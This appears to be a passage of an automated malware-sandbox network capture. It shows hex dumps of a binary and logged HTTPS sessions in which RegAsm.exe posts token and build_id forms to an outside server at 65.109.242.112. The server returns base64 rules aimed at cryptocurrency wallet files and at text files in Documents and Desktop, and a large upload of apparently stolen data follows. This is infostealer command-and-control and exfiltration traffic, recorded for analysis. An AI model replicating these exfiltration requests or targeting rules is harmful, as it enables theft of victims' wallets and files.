                                                                                                                                                                                                                                                                2024-05-12 10:47:32 UTC16384INData Raw: ff ff eb 1e 0f b6 4e 03 0f b6 42 03 2b c8 74 12 33 c0 85 c9 0f 9f c0 8d 0c 45 ff ff ff ff eb 02 33 c9 85 c9 0f 85 6f 05 00 00 8b 46 04 3b 42 04 74 4f 0f b6 f8 0f b6 42 04 2b f8 75 18 0f b6 7e 05 0f b6 42 05 2b f8 75 0c 0f b6 7e 06 0f b6 42 06 2b f8 74 10 33 c9 85 ff 0f 9f c1 8d 0c 4d ff ff ff ff eb 1e 0f b6 4e 07 0f b6 42 07 2b c8 74 12 33 c0 85 c9 0f 9f c0 8d 0c 45 ff ff ff ff eb 02 33 c9 85 c9 0f 85 0e 05 00 00 8b 46 08 3b 42 08 74 4f 0f b6 f8 0f b6 42 08 2b f8 75 18 0f b6 7e 09 0f b6 42 09 2b f8 75 0c 0f b6 7e 0a 0f b6 42 0a 2b f8 74 10 33 c9 85 ff 0f 9f c1 8d 0c 4d ff ff ff ff eb 1e 0f b6 4e 0b 0f b6 42 0b 2b c8 74 12 33 c0 85 c9 0f 9f c0 8d 0c 45 ff ff ff ff eb 02 33 c9 85 c9 0f 85 ad 04 00 00 8b 46 0c 3b 42 0c 74 4f 0f b6 f8 0f b6 42 0c 2b f8 75 18
                                                                                                                                                                                                                                                                Data Ascii: NB+t3E3oF;BtOB+u~B+u~B+t3MNB+t3E3F;BtOB+u~B+u~B+t3MNB+t3E3F;BtOB+u
                                                                                                                                                                                                                                                                2024-05-12 10:47:32 UTC16384INData Raw: 08 00 00 59 6a 28 8d 4d 80 8b f0 e8 67 f3 ff ff 56 8d 4d f0 51 8b c8 e8 0a f7 ff ff 6a 29 8d 85 70 ff ff ff 50 8d 4d f0 e8 1b f7 ff ff 50 8d 4d f8 e8 78 f7 ff ff 81 7d dc 00 08 00 00 75 1a 8b c3 25 00 07 00 00 3d 00 02 00 00 74 0c 8d 45 98 50 8d 4d f8 e8 55 f7 ff ff a1 98 f2 00 10 c1 e8 13 f7 d0 a8 01 8d 45 cc 50 74 11 e8 92 2e 00 00 59 50 8d 4d f8 e8 34 f7 ff ff eb 0f e8 81 2e 00 00 59 50 8d 4d f8 e8 9f f8 ff ff 8d 45 cc 50 e8 69 23 00 00 59 50 8d 4d f8 e8 10 f7 ff ff a1 98 f2 00 10 c1 e8 08 f7 d0 a8 01 8d 45 cc 50 74 11 e8 30 3e 00 00 59 50 8d 4d f8 e8 ef f6 ff ff eb 0f e8 1f 3e 00 00 59 50 8d 4d f8 e8 5a f8 ff ff 8d 45 cc 50 e8 6a 19 00 00 59 50 8d 4d f8 e8 47 f8 ff ff a1 98 f2 00 10 c1 e8 02 f7 d0 a8 01 74 20 85 ff 74 1c 8b 45 f8 89 07 8b 45 fc 89 47
                                                                                                                                                                                                                                                                Data Ascii: Yj(MgVMQj)pPMPMx}u%=tEPMUEPt.YPM4.YPMEPi#YPMEPt0>YPM>YPMZEPjYPMGt tEEG
                                                                                                                                                                                                                                                                2024-05-12 10:47:32 UTC16384INData Raw: 0f 83 fa 10 74 15 b8 ff ff 00 00 e9 f7 01 00 00 81 c9 80 00 00 00 eb 03 83 c9 40 83 e0 06 2b c7 0f 84 df 01 00 00 2b c6 74 1e 2b c6 74 0f 2b c6 75 d4 81 c9 00 04 00 00 e9 c8 01 00 00 81 c9 00 01 00 00 e9 bd 01 00 00 81 c9 00 02 00 00 e9 b2 01 00 00 2b c6 75 af 8d 51 01 89 15 90 f2 00 10 8a 02 3c 30 7c 2a 3c 39 7f 26 0f be c0 83 c2 d1 03 c2 a3 90 f2 00 10 e8 8c fe ff ff 0d 00 00 01 00 e9 81 01 00 00 b8 fe ff 00 00 e9 77 01 00 00 b9 ff ff 00 00 e9 dc 00 00 00 83 f8 2f 0f 8e 63 ff ff ff 8b f2 83 f8 35 7e 62 83 f8 41 0f 85 53 ff ff ff 81 c9 00 90 00 00 e9 b8 00 00 00 b9 fe ff 00 00 4a e9 ad 00 00 00 81 c9 00 98 00 00 e9 a2 00 00 00 83 e8 43 0f 84 94 00 00 00 83 e8 01 0f 84 83 00 00 00 83 e8 01 74 76 83 e8 0d 0f 85 12 ff ff ff 42 89 15 90 f2 00 10 8b f2 8a 0a
                                                                                                                                                                                                                                                                Data Ascii: t@++t+t+u+uQ<0|*<9&w/c5~bASJCtvB
                                                                                                                                                                                                                                                                2024-05-12 10:47:32 UTC15589INData Raw: ae e8 7c cd cc c1 be ea d2 ff 35 4e c0 ce b5 7a ad bb a6 bb 2e dc 94 e9 f3 1e 7d e0 ec 28 a3 07 82 66 5a c3 5b 5a cb ec 03 c9 e3 2c 94 15 21 2b a0 f9 d9 9b 4b e7 b6 de eb 20 51 8c 3e fa 2c 23 d5 18 b0 f0 b1 a0 70 6c 7a ef 8b 83 48 a6 3a 02 06 ef a0 8a 2c b7 88 45 30 82 05 ff 30 82 03 e7 a0 03 02 01 02 02 13 33 00 00 01 51 9e 8d 8f 40 71 a3 0e 41 00 00 00 00 01 51 30 0d 06 09 2a 86 48 86 f7 0d 01 01 0b 05 00 30 7e 31 0b 30 09 06 03 55 04 06 13 02 55 53 31 13 30 11 06 03 55 04 08 13 0a 57 61 73 68 69 6e 67 74 6f 6e 31 10 30 0e 06 03 55 04 07 13 07 52 65 64 6d 6f 6e 64 31 1e 30 1c 06 03 55 04 0a 13 15 4d 69 63 72 6f 73 6f 66 74 20 43 6f 72 70 6f 72 61 74 69 6f 6e 31 28 30 26 06 03 55 04 03 13 1f 4d 69 63 72 6f 73 6f 66 74 20 43 6f 64 65 20 53 69 67 6e 69 6e
                                                                                                                                                                                                                                                                Data Ascii: |5Nz.}(fZ[Z,!+K Q>,#plzH:,E003Q@qAQ0*H0~10UUS10UWashington10URedmond10UMicrosoft Corporation1(0&UMicrosoft Code Signin


                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                18192.168.2.44975465.109.242.1124432832C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                2024-05-12 10:47:33 UTC327OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                Content-Type: multipart/form-data; boundary=----FHDAFIIDAKJDGDHIDAKJ
                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36 OPR/101.0.0.0
                                                                                                                                                                                                                                                                Host: 65.109.242.112
                                                                                                                                                                                                                                                                Content-Length: 1145
                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                                2024-05-12 10:47:33 UTC1145OUTData Raw: 2d 2d 2d 2d 2d 2d 46 48 44 41 46 49 49 44 41 4b 4a 44 47 44 48 49 44 41 4b 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 32 33 34 63 65 31 39 31 64 39 30 37 35 39 33 32 39 36 65 65 38 38 62 36 37 39 33 61 37 65 35 0d 0a 2d 2d 2d 2d 2d 2d 46 48 44 41 46 49 49 44 41 4b 4a 44 47 44 48 49 44 41 4b 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 36 38 31 61 32 32 33 62 65 63 31 38 30 65 62 66 64 63 34 38 35 34 37 64 33 64 35 62 64 37 38 34 0d 0a 2d 2d 2d 2d 2d 2d 46 48 44 41 46 49 49 44 41 4b 4a 44 47 44 48 49 44 41 4b 4a 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                Data Ascii: ------FHDAFIIDAKJDGDHIDAKJContent-Disposition: form-data; name="token"b234ce191d907593296ee88b6793a7e5------FHDAFIIDAKJDGDHIDAKJContent-Disposition: form-data; name="build_id"681a223bec180ebfdc48547d3d5bd784------FHDAFIIDAKJDGDHIDAKJCont
                                                                                                                                                                                                                                                                2024-05-12 10:47:34 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                                                Date: Sun, 12 May 2024 10:47:34 GMT
                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                2024-05-12 10:47:34 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                Data Ascii: 2ok0


                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                19192.168.2.44975565.109.242.1124432832C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                2024-05-12 10:47:34 UTC326OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                Content-Type: multipart/form-data; boundary=----CFBAFBFIEHIDBGDHCGIE
                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36 OPR/101.0.0.0
                                                                                                                                                                                                                                                                Host: 65.109.242.112
                                                                                                                                                                                                                                                                Content-Length: 331
                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                                2024-05-12 10:47:34 UTC331OUTData Raw: 2d 2d 2d 2d 2d 2d 43 46 42 41 46 42 46 49 45 48 49 44 42 47 44 48 43 47 49 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 32 33 34 63 65 31 39 31 64 39 30 37 35 39 33 32 39 36 65 65 38 38 62 36 37 39 33 61 37 65 35 0d 0a 2d 2d 2d 2d 2d 2d 43 46 42 41 46 42 46 49 45 48 49 44 42 47 44 48 43 47 49 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 36 38 31 61 32 32 33 62 65 63 31 38 30 65 62 66 64 63 34 38 35 34 37 64 33 64 35 62 64 37 38 34 0d 0a 2d 2d 2d 2d 2d 2d 43 46 42 41 46 42 46 49 45 48 49 44 42 47 44 48 43 47 49 45 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                Data Ascii: ------CFBAFBFIEHIDBGDHCGIEContent-Disposition: form-data; name="token"b234ce191d907593296ee88b6793a7e5------CFBAFBFIEHIDBGDHCGIEContent-Disposition: form-data; name="build_id"681a223bec180ebfdc48547d3d5bd784------CFBAFBFIEHIDBGDHCGIECont
                                                                                                                                                                                                                                                                2024-05-12 10:47:35 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                                                Date: Sun, 12 May 2024 10:47:35 GMT
                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                2024-05-12 10:47:35 UTC2228INData Raw: 38 61 38 0d 0a 51 6d 6c 30 59 32 39 70 62 69 42 44 62 33 4a 6c 66 44 46 38 58 45 4a 70 64 47 4e 76 61 57 35 63 64 32 46 73 62 47 56 30 63 31 78 38 64 32 46 73 62 47 56 30 4c 6d 52 68 64 48 77 78 66 45 4a 70 64 47 4e 76 61 57 34 67 51 32 39 79 5a 53 42 50 62 47 52 38 4d 58 78 63 51 6d 6c 30 59 32 39 70 62 6c 78 38 4b 6e 64 68 62 47 78 6c 64 43 6f 75 5a 47 46 30 66 44 42 38 52 47 39 6e 5a 57 4e 76 61 57 35 38 4d 58 78 63 52 47 39 6e 5a 57 4e 76 61 57 35 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 6d 52 68 64 48 77 77 66 46 4a 68 64 6d 56 75 49 45 4e 76 63 6d 56 38 4d 58 78 63 55 6d 46 32 5a 57 35 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 6d 52 68 64 48 77 77 66 45 52 68 5a 57 52 68 62 48 56 7a 49 45 31 68 61 57 35 75 5a 58 52 38 4d 58 78 63 52 47 46 6c 5a 47
                                                                                                                                                                                                                                                                Data Ascii: 8a8Qml0Y29pbiBDb3JlfDF8XEJpdGNvaW5cd2FsbGV0c1x8d2FsbGV0LmRhdHwxfEJpdGNvaW4gQ29yZSBPbGR8MXxcQml0Y29pblx8KndhbGxldCouZGF0fDB8RG9nZWNvaW58MXxcRG9nZWNvaW5cfCp3YWxsZXQqLmRhdHwwfFJhdmVuIENvcmV8MXxcUmF2ZW5cfCp3YWxsZXQqLmRhdHwwfERhZWRhbHVzIE1haW5uZXR8MXxcRGFlZG


                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                20192.168.2.44975665.109.242.1124432832C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                2024-05-12 10:47:36 UTC326OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                Content-Type: multipart/form-data; boundary=----FHDAFIIDAKJDGDHIDAKJ
                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36 OPR/101.0.0.0
                                                                                                                                                                                                                                                                Host: 65.109.242.112
                                                                                                                                                                                                                                                                Content-Length: 331
                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                                2024-05-12 10:47:36 UTC331OUTData Raw: 2d 2d 2d 2d 2d 2d 46 48 44 41 46 49 49 44 41 4b 4a 44 47 44 48 49 44 41 4b 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 32 33 34 63 65 31 39 31 64 39 30 37 35 39 33 32 39 36 65 65 38 38 62 36 37 39 33 61 37 65 35 0d 0a 2d 2d 2d 2d 2d 2d 46 48 44 41 46 49 49 44 41 4b 4a 44 47 44 48 49 44 41 4b 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 36 38 31 61 32 32 33 62 65 63 31 38 30 65 62 66 64 63 34 38 35 34 37 64 33 64 35 62 64 37 38 34 0d 0a 2d 2d 2d 2d 2d 2d 46 48 44 41 46 49 49 44 41 4b 4a 44 47 44 48 49 44 41 4b 4a 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                Data Ascii: ------FHDAFIIDAKJDGDHIDAKJContent-Disposition: form-data; name="token"b234ce191d907593296ee88b6793a7e5------FHDAFIIDAKJDGDHIDAKJContent-Disposition: form-data; name="build_id"681a223bec180ebfdc48547d3d5bd784------FHDAFIIDAKJDGDHIDAKJCont
                                                                                                                                                                                                                                                                2024-05-12 10:47:37 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                                                Date: Sun, 12 May 2024 10:47:37 GMT
                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                2024-05-12 10:47:37 UTC131INData Raw: 37 38 0d 0a 52 47 56 6d 59 58 56 73 64 48 77 6c 52 45 39 44 56 55 31 46 54 6c 52 54 4a 56 78 38 4b 69 35 30 65 48 52 38 4e 54 42 38 64 48 4a 31 5a 58 77 71 64 32 6c 75 5a 47 39 33 63 79 70 38 5a 47 56 7a 61 33 52 76 63 48 77 6c 52 45 56 54 53 31 52 50 55 43 56 63 66 43 6f 75 64 48 68 30 66 44 55 77 66 47 5a 68 62 48 4e 6c 66 43 70 33 61 57 35 6b 62 33 64 7a 4b 6e 77 3d 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                Data Ascii: 78RGVmYXVsdHwlRE9DVU1FTlRTJVx8Ki50eHR8NTB8dHJ1ZXwqd2luZG93cyp8ZGVza3RvcHwlREVTS1RPUCVcfCoudHh0fDUwfGZhbHNlfCp3aW5kb3dzKnw=0


                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                21192.168.2.44975765.109.242.1124432832C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                2024-05-12 10:47:38 UTC326OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                Content-Type: multipart/form-data; boundary=----AKKECAFBFHJDGDHIEHJD
                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36 OPR/101.0.0.0
                                                                                                                                                                                                                                                                Host: 65.109.242.112
                                                                                                                                                                                                                                                                Content-Length: 453
                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                                2024-05-12 10:47:38 UTC453OUTData Raw: 2d 2d 2d 2d 2d 2d 41 4b 4b 45 43 41 46 42 46 48 4a 44 47 44 48 49 45 48 4a 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 32 33 34 63 65 31 39 31 64 39 30 37 35 39 33 32 39 36 65 65 38 38 62 36 37 39 33 61 37 65 35 0d 0a 2d 2d 2d 2d 2d 2d 41 4b 4b 45 43 41 46 42 46 48 4a 44 47 44 48 49 45 48 4a 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 36 38 31 61 32 32 33 62 65 63 31 38 30 65 62 66 64 63 34 38 35 34 37 64 33 64 35 62 64 37 38 34 0d 0a 2d 2d 2d 2d 2d 2d 41 4b 4b 45 43 41 46 42 46 48 4a 44 47 44 48 49 45 48 4a 44 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                Data Ascii: ------AKKECAFBFHJDGDHIEHJDContent-Disposition: form-data; name="token"b234ce191d907593296ee88b6793a7e5------AKKECAFBFHJDGDHIEHJDContent-Disposition: form-data; name="build_id"681a223bec180ebfdc48547d3d5bd784------AKKECAFBFHJDGDHIEHJDCont
                                                                                                                                                                                                                                                                2024-05-12 10:47:39 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                                                Date: Sun, 12 May 2024 10:47:38 GMT
                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                2024-05-12 10:47:39 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                Data Ascii: 2ok0


                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                22192.168.2.44975865.109.242.1124432832C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                2024-05-12 10:47:40 UTC329OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                Content-Type: multipart/form-data; boundary=----HIDHDAAEHIEHIECBKJDG
                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36 OPR/101.0.0.0
                                                                                                                                                                                                                                                                Host: 65.109.242.112
                                                                                                                                                                                                                                                                Content-Length: 131529
                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                                2024-05-12 10:47:40 UTC16355OUTData Raw: 2d 2d 2d 2d 2d 2d 48 49 44 48 44 41 41 45 48 49 45 48 49 45 43 42 4b 4a 44 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 32 33 34 63 65 31 39 31 64 39 30 37 35 39 33 32 39 36 65 65 38 38 62 36 37 39 33 61 37 65 35 0d 0a 2d 2d 2d 2d 2d 2d 48 49 44 48 44 41 41 45 48 49 45 48 49 45 43 42 4b 4a 44 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 36 38 31 61 32 32 33 62 65 63 31 38 30 65 62 66 64 63 34 38 35 34 37 64 33 64 35 62 64 37 38 34 0d 0a 2d 2d 2d 2d 2d 2d 48 49 44 48 44 41 41 45 48 49 45 48 49 45 43 42 4b 4a 44 47 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                Data Ascii: ------HIDHDAAEHIEHIECBKJDGContent-Disposition: form-data; name="token"b234ce191d907593296ee88b6793a7e5------HIDHDAAEHIEHIECBKJDGContent-Disposition: form-data; name="build_id"681a223bec180ebfdc48547d3d5bd784------HIDHDAAEHIEHIECBKJDGCont
                                                                                                                                                                                                                                                                2024-05-12 10:47:40 UTC16355OUTData Raw: 73 4c 66 78 46 72 74 74 63 54 33 50 38 41 5a 32 6e 57 58 32 71 4f 52 58 58 65 2b 56 42 55 45 37 63 66 33 68 77 4f 31 64 42 38 4d 37 35 64 50 38 46 33 45 72 79 57 73 59 4f 6f 73 75 62 6d 66 79 6c 2f 31 61 64 44 67 38 38 64 50 72 58 6a 56 38 4a 52 56 50 6d 70 4e 74 36 62 2b 5a 39 44 54 78 46 54 6e 74 55 53 53 31 2f 41 36 6d 57 30 61 58 54 72 6e 54 62 7a 52 37 71 35 69 65 65 61 51 50 47 38 57 4d 4e 49 7a 4b 52 75 63 45 45 42 68 32 72 7a 44 56 39 4b 75 4e 49 76 7a 62 58 45 62 78 37 68 76 6a 33 6c 64 78 51 6b 67 45 37 53 51 44 77 65 39 65 70 66 38 4a 4c 44 2f 77 41 2f 6d 69 66 2b 44 51 66 2f 41 42 46 63 64 38 52 2f 2b 52 69 67 2f 77 43 76 52 66 38 41 30 4e 36 65 57 65 31 70 59 6d 4d 58 6f 70 58 2f 41 41 52 78 5a 77 71 56 58 43 53 6e 75 34 32 74 38 32 6b 63 66
                                                                                                                                                                                                                                                                Data Ascii: sLfxFrttcT3P8AZ2nWX2qORXXe+VBUE7cf3hwO1dB8M75dP8F3EryWsYOosubmfyl/1adDg88dPrXjV8JRVPmpNt6b+Z9DTxFTntUSS1/A6mW0aXTrnTbzR7q5ieeaQPG8WMNIzKRucEEBh2rzDV9KuNIvzbXEbx7hvj3ldxQkgE7SQDwe9epf8JLD/wA/mif+DQf/ABFcd8R/+Rig/wCvRf8A0N6eWe1pYmMXopX/AARxZwqVXCSnu42t82kcf
                                                                                                                                                                                                                                                                2024-05-12 10:47:40 UTC16355OUTData Raw: 4b 53 49 7a 53 48 70 53 6b 45 64 52 69 6a 6d 67 61 47 30 55 74 49 61 42 69 55 55 74 46 4d 59 6c 4a 53 30 55 42 63 53 6b 70 61 4b 42 6a 65 61 58 6d 69 67 30 44 45 4e 4a 53 30 6c 41 30 47 4b 53 6c 6f 4e 4d 42 43 4b 62 54 71 4d 55 44 47 69 67 30 76 46 4a 51 4d 51 30 6e 61 6e 55 6d 4b 51 78 75 4b 54 38 4b 63 52 53 64 36 64 68 69 45 63 55 6e 2b 65 6c 4c 69 6c 4e 46 68 6f 59 52 69 6b 70 39 4e 6f 47 49 65 61 44 53 30 6d 4f 39 49 59 30 6a 38 61 51 30 38 34 36 64 36 53 6b 4d 5a 6a 6d 6a 74 2b 4e 4f 78 78 54 63 63 2b 6d 4b 64 68 69 48 72 53 59 7a 33 70 53 4b 4f 63 47 6b 4d 53 6b 78 7a 2b 46 4c 53 64 76 72 52 59 59 47 6b 37 59 70 66 30 70 44 67 6a 69 69 77 78 4b 54 72 53 39 71 4f 6c 41 78 4f 39 42 34 70 65 50 79 70 4d 30 44 45 78 51 66 58 39 61 64 6a 72 33 70 50 72
                                                                                                                                                                                                                                                                Data Ascii: KSIzSHpSkEdRijmgaG0UtIaBiUUtFMYlJS0UBcSkpaKBjeaXmig0DENJS0lA0GKSloNMBCKbTqMUDGig0vFJQMQ0nanUmKQxuKT8KcRSd6dhiEcUn+elLilNFhoYRikp9NoGIeaDS0mO9IY0j8aQ0846d6SkMZjmjt+NOxxTcc+mKdhiHrSYz3pSKOcGkMSkxz+FLSdvrRYYGk7Ypf0pDgjiiwxKTrS9qOlAxO9B4pePypM0DExQfX9adjr3pPr
                                                                                                                                                                                                                                                                2024-05-12 10:47:40 UTC16355OUTData Raw: 62 73 33 55 4c 53 52 43 35 5a 6c 45 4c 7a 49 43 53 75 7a 62 6b 4b 53 43 41 64 33 6f 63 64 68 54 6c 31 65 79 67 54 79 5a 49 37 75 61 37 4e 73 6c 77 35 67 5a 51 6b 41 64 41 79 41 67 71 53 35 32 6b 45 38 72 31 78 37 30 47 37 67 57 57 34 6d 75 4e 4e 75 72 61 38 75 56 6b 4c 58 56 76 49 4a 59 6f 70 58 42 42 6c 53 45 68 54 6e 6b 38 47 54 41 4a 79 42 77 42 56 53 30 79 6c 67 6f 75 74 4f 6e 6e 76 55 74 78 62 4c 64 51 7a 2b 57 73 71 4b 6f 56 50 4d 51 71 32 53 41 41 4d 71 79 35 41 48 66 6d 74 6f 7a 78 66 4d 6f 79 76 62 72 36 36 37 66 67 63 30 71 57 42 35 48 4f 50 4c 66 70 36 61 62 2b 64 72 39 7a 52 67 75 6f 5a 4e 53 74 62 4a 35 5a 46 4e 7a 5a 51 53 71 37 59 77 73 30 73 53 73 6f 50 48 33 64 7a 41 65 32 65 76 46 4a 48 63 6e 7a 62 65 32 6b 56 31 75 32 67 45 38 38 5a 48
                                                                                                                                                                                                                                                                Data Ascii: bs3ULSRC5ZlELzICSuzbkKSCAd3ocdhTl1eygTyZI7ua7Nslw5gZQkAdAyAgqS52kE8r1x70G7gWW4muNNura8uVkLXVvIJYopXBBlSEhTnk8GTAJyBwBVS0ylgoutOnnvUtxbLdQz+WsqKoVPMQq2SAAMqy5AHfmtozxfMoyvbr667fgc0qWB5HOPLfp6ab+dr9zRguoZNStbJ5ZFNzZQSq7Yws0sSsoPH3dzAe2evFJHcnzbe2kV1u2gE88ZH
                                                                                                                                                                                                                                                                2024-05-12 10:47:40 UTC16355OUTData Raw: 72 54 2b 38 2f 2f 66 4e 4c 6c 66 59 4c 4d 75 44 72 53 47 71 6e 39 70 57 6e 39 39 2f 2b 2b 61 50 37 54 74 4f 50 6e 66 38 41 37 35 6f 35 58 32 43 7a 4c 64 4c 31 71 6f 4e 54 73 2f 37 37 2f 77 44 66 4e 48 39 70 57 66 65 52 78 2f 77 47 6a 6c 66 59 64 69 33 53 31 54 47 70 57 65 66 39 59 2f 38 41 33 7a 54 76 37 54 73 68 2f 77 41 74 48 2f 37 35 6f 35 58 32 45 57 65 39 61 47 6b 2f 38 66 34 2f 33 48 2f 39 42 4e 59 33 39 70 32 4a 36 79 75 50 2b 41 31 50 61 36 31 5a 32 30 33 6d 72 49 78 49 56 67 41 56 39 51 52 57 64 57 6e 4b 55 47 6b 68 57 5a 7a 4c 39 65 6d 61 6a 4a 2f 47 6e 4f 32 54 55 5a 72 31 46 70 46 48 52 46 43 45 30 77 2b 39 4b 33 76 54 53 61 6c 73 30 51 64 36 51 6e 4f 61 4d 38 39 4b 51 31 4c 4b 45 50 41 7a 6e 38 4b 54 74 6d 6c 50 2b 54 53 64 75 6c 51 32 55 68
